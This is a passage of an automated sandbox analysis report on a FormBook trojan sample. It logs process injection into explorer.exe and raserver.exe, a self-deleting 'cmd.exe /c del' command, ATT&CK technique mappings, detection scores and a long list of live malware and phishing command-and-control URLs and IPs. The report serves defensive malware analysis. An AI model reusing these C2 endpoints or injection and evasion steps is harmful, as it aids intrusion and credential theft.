              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015EE443 mov eax, dword ptr fs:[00000030h]0_2_015EE443
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015EE443 mov eax, dword ptr fs:[00000030h]0_2_015EE443
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015EE443 mov eax, dword ptr fs:[00000030h]0_2_015EE443
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015EE443 mov eax, dword ptr fs:[00000030h]0_2_015EE443
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015EE443 mov eax, dword ptr fs:[00000030h]0_2_015EE443
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015EE443 mov eax, dword ptr fs:[00000030h]0_2_015EE443
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015EE443 mov eax, dword ptr fs:[00000030h]0_2_015EE443
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015DA470 mov eax, dword ptr fs:[00000030h]0_2_015DA470
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015DA470 mov eax, dword ptr fs:[00000030h]0_2_015DA470
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015DA470 mov eax, dword ptr fs:[00000030h]0_2_015DA470
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0166A456 mov eax, dword ptr fs:[00000030h]0_2_0166A456
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_01636420 mov eax, dword ptr fs:[00000030h]0_2_01636420
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exe Process token adjusted: Debug

              HIPS / PFW / Operating System Protection Evasion

              Source: C:\Windows\explorer.exe Network Connect: 103.224.212.212 80
              Source: C:\Windows\explorer.exe Network Connect: 104.21.34.218 80
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exe Section loaded: NULL target: C:\Windows\SysWOW64\raserver.exe protection: execute and read and write
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exe Section loaded: NULL target: C:\Windows\SysWOW64\raserver.exe protection: execute and read and write
              Source: C:\Windows\SysWOW64\raserver.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
              Source: C:\Windows\SysWOW64\raserver.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exe Thread register set: target process: 4004
              Source: C:\Windows\SysWOW64\raserver.exe Thread register set: target process: 4004
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exe Thread APC queued: target process: C:\Windows\explorer.exe
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exe Section unmapped: C:\Windows\SysWOW64\raserver.exe base address: 880000
              Source: C:\Windows\SysWOW64\raserver.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\jqPZZhDmjh.exe"
              Source: explorer.exe, 00000002.00000000.2056604831.00000000013A1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000002.3300573862.00000000013A0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: IProgram Manager
              Source: explorer.exe, 00000002.00000000.2057673099.00000000048E0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2056604831.00000000013A1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000002.3300573862.00000000013A0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
              Source: explorer.exe, 00000002.00000000.2056604831.00000000013A1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000002.3300573862.00000000013A0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
              Source: explorer.exe, 00000002.00000002.3300037845.0000000000D60000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2056290643.0000000000D69000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: +Progman
              Source: explorer.exe, 00000002.00000000.2056604831.00000000013A1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000002.3300573862.00000000013A0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
              Source: explorer.exe, 00000002.00000003.3075103317.00000000098E0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979324812.00000000098AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3304893437.00000000098E3000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Shell_TrayWnd31A

              Stealing of Sensitive Information

              Source: Yara match | File source: jqPZZhDmjh.exe, type: SAMPLE
              Source: Yara match | File source: 0.2.jqPZZhDmjh.exe.970000.0.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 0.0.jqPZZhDmjh.exe.970000.0.unpack, type: UNPACKEDPE

              Remote Access Functionality

              Source: Yara match | File source: jqPZZhDmjh.exe, type: SAMPLE
              Source: Yara match | File source: 0.2.jqPZZhDmjh.exe.970000.0.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 0.0.jqPZZhDmjh.exe.970000.0.unpack, type: UNPACKEDPE

              Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
              --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | ---
              Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Shared Modules | 1 DLL Side-Loading | 512 Process Injection | 1 Rootkit | 1 Credential API Hooking | 121 Security Software Discovery | Remote Services | 1 Credential API Hooking | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
              Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 2 Virtualization/Sandbox Evasion | LSASS Memory | 2 Virtualization/Sandbox Evasion | Remote Desktop Protocol | 1 Archive Collected Data | 2 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
              Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 512 Process Injection | Security Account Manager | 2 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
              Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Deobfuscate/Decode Files or Information | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 12 Application Layer Protocol | Traffic Duplication | Data Destruction
              Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 4 Obfuscated Files or Information | LSA Secrets | 1 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
              Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 2 Software Packing | Cached Domain Credentials | 11 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
              DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 DLL Side-Loading | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery

              Source | Detection | Scanner | Label | Link
              --- | --- | --- | --- | ---
              jqPZZhDmjh.exe | 89% | ReversingLabs | Win32.Trojan.FormBook |
              jqPZZhDmjh.exe | 72% | Virustotal | | Browse
              jqPZZhDmjh.exe | 100% | Avira | TR/Crypt.ZPACK.Gen |
              jqPZZhDmjh.exe | 100% | Joe Sandbox ML | |
              No Antivirus matches
              No Antivirus matches
              Source | Detection | Scanner | Label | Link
              --- | --- | --- | --- | ---
              www.123bu6.shop | 1% | Virustotal | | Browse
              www.theanhedonia.com | 10% | Virustotal | | Browse
              www.truedatalab.com | 0% | Virustotal | | Browse
              www.roelofsen.online | 0% | Virustotal | | Browse
              www.soulheroes.online | 0% | Virustotal | | Browse
              Name | IP | Active | Malicious | Antivirus Detection | Reputation
              --- | --- | --- | --- | --- | ---
              www.123bu6.shop | 104.21.34.218 | true | true | | unknown
              www.theanhedonia.com | 103.224.212.212 | true | true | | unknown
              www.truedatalab.com | 0.0.0.0 | true | false | | unknown
              www.roelofsen.online | unknown | unknown | true | | unknown
              www.soulheroes.online | unknown | unknown | true | | unknown
              Name | Malicious | Antivirus Detection | Reputation
              --- | --- | --- | ---
              http://www.123bu6.shop/gy14/?Szu8Zp=FTAq1zBP6NNjQjBPydRh3L/j4TP0vWodDfrtqSKklHyFdw4ikOglIB/U9f3VYzUg75agPLVEuw==&3fzlqX=DtjxV | true | Avira URL Cloud: phishing | unknown
              www.venitro.com/gy14/ | true | Avira URL Cloud: malware | low
              http://www.theanhedonia.com/gy14/?Szu8Zp=sJB9xXDMLUearYsOJfMPyoOL09k0Ht7qJDXT7N+Z0c0oohLZUl68J6Fs60bzmHjgtnYtuzz0MQ==&3fzlqX=DtjxV | true | Avira URL Cloud: malware | unknown
                            • Avira URL Cloud: phishing
                            unknown
                            http://www.sgyy3ej2dgwesb5.com/gy14/explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: malware
                            unknown
                            https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earningsexplorer.exe, 00000002.00000002.3302438018.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                              high
                              http://www.venitro.com/gy14/www.artbydianayorktownva.comexplorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: malware
                              unknown
                              https://api.msn.com/v1/news/Feed/Windows?activityId=435B7A89D7D74BDF801F2DA188906BAF&timeOut=5000&ocexplorer.exe, 00000002.00000002.3302866779.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2058382068.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3075332688.0000000007414000.00000004.00000001.00020000.00000000.sdmpfalse
                                high
                                https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000002.00000002.3302866779.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2058382068.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3075332688.0000000007414000.00000004.00000001.00020000.00000000.sdmpfalse
                                  high
                                  https://www.msn.com/en-us/travel/news/you-can-t-beat-bobby-flay-s-phoenix-airport-restaurant-one-of-explorer.exe, 00000002.00000002.3302866779.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2058382068.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3075332688.0000000007414000.00000004.00000001.00020000.00000000.sdmpfalse
                                    high
                                    http://www.ampsportss.com/gy14/explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: malware
                                    unknown
                                    http://www.theanhedonia.com/gy14/explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: malware
                                    unknown
                                    http://www.twinklethrive.com/gy14/www.ampsportss.comexplorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: malware
                                    unknown
                                    http://www.883831.comReferer:explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.123bu6.shopReferer:explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.roelofsen.online/gy14/explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: malware
                                    unknown
                                    https://android.notify.windows.com/iOSexplorer.exe, 00000002.00000000.2073710031.000000000BFDF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3309996442.000000000BFDF000.00000004.00000001.00020000.00000000.sdmpfalse
                                      high
                                      https://outlook.comeexplorer.exe, 00000002.00000002.3309996442.000000000C048000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2073710031.000000000C048000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppexplorer.exe, 00000002.00000000.2066913018.00000000099AB000.00000004.00000001.00020000.00000000.sdmpfalse
                                        high
                                        https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-theexplorer.exe, 00000002.00000002.3302866779.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2058382068.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3075332688.0000000007414000.00000004.00000001.00020000.00000000.sdmpfalse
                                          high
                                          http://www.mtdiyx.xyzexplorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: malware
                                          unknown
                                          http://www.venitro.com/gy14/explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: malware
                                          unknown
                                          https://www.msn.com/en-us/news/politics/kevin-mccarthy-s-ouster-as-house-speaker-could-cost-gop-its-explorer.exe, 00000002.00000002.3302866779.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2058382068.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3075332688.0000000007414000.00000004.00000001.00020000.00000000.sdmpfalse
                                            high
                                            https://api.msn.com/v1/news/Feed/Windows?explorer.exe, 00000002.00000002.3304893437.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2065986866.000000000962B000.00000004.00000001.00020000.00000000.sdmpfalse
                                              high
                                              https://api.msn.com/Iexplorer.exe, 00000002.00000002.3304893437.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2065986866.000000000962B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                high
                                                http://www.ampsportss.com/gy14/www.sgyy3ej2dgwesb5.comexplorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: malware
                                                unknown
                                                http://www.twinklethrive.com/gy14/explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: malware
                                                unknown
                                                http://www.roelofsen.onlineReferer:explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.883831.com/gy14/www.venitro.comexplorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: malware
                                                unknown
                                                http://www.artbydianayorktownva.comexplorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: malware
                                                unknown
                                                http://www.sgyy3ej2dgwesb5.com/gy14/www.883831.comexplorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: malware
                                                unknown
                                                http://schemas.microexplorer.exe, 00000002.00000002.3300780586.00000000028A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000002.3303691234.0000000007B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000002.3303668178.0000000007B50000.00000002.00000001.00040000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://www.sgyy3ej2dgwesb5.comReferer:explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.soulheroes.online/gy14/www.roelofsen.onlineexplorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: malware
                                                unknown
                                                http://www.ampsportss.comexplorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: malware
                                                unknown
                                                http://www.theanhedonia.comexplorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: phishing
                                                unknown
                                                https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000002.00000002.3302866779.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2058382068.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3075332688.0000000007414000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  high
                                                  http://www.budgetnurseries.comReferer:explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.budgetnurseries.com/gy14/explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: malware
                                                  unknown
                                                  http://www.roelofsen.online/gy14/www.truedatalab.comexplorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: malware
                                                  unknown
                                                  https://www.msn.com/en-us/news/politics/republicans-already-barred-trump-from-being-speaker-of-the-hexplorer.exe, 00000002.00000000.2058382068.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3302438018.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    high
                                                    https://www.msn.com/en-us/news/politics/trump-campaign-says-he-raised-more-than-45-million-in-3rd-quexplorer.exe, 00000002.00000002.3302866779.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2058382068.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3075332688.0000000007414000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      high
                                                      http://www.whatsapp1.autos/gy14/explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: malware
                                                      unknown
                                                      http://www.whatsapp1.autosReferer:explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.artbydianayorktownva.com/gy14/explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: malware
                                                      unknown
                                                      http://www.budgetnurseries.com/gy14/www.mtdiyx.xyzexplorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: malware
                                                      unknown
                                                      http://www.soulheroes.onlineexplorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: malware
                                                      unknown
                                                      http://www.twinklethrive.comReferer:explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.twinklethrive.comexplorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhzexplorer.exe, 00000002.00000002.3302866779.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2058382068.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3075332688.0000000007414000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        high
                                                        https://excel.office.com-explorer.exe, 00000002.00000002.3309996442.000000000C048000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2073710031.000000000C048000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        low
